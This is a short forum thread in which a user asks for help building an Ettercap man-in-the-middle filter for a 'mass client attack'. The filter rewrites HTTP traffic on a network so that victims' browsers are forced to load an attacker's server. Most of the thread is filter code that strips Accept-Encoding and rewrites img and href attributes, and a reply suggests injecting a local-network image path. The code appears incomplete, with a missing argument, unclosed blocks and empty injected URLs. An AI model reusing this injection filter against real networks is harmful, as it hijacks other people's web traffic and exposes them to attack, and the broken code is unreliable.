Results 1 to 2 of 2

Thread: mass client attack - ettercap filter

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008


    so with the fast-track mass client attack i would like to some how use a ettercap filter to force a client to visit the server... I hope some one can give me a little help with the filter...

    this is what i have tried
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"\" ");
       replace("IMG SRC=", "img src=\"\" ");
       msg("Filter Ran.\n");
    this is the filter from irongeek!
    i new this would not work before i tried it... i just want to give a good example of what i would like to accomplish

    Lol nvm i figured it out... its kinda cool

    replace("a href=", "a href=\"\" ");
    replace("a href=", "a href=\"\" "

    change this in the filter... this works some what... ill test a little more

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008


    if its on your local network you can try something like this
    "<img src=\"\\\\\\"> "

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts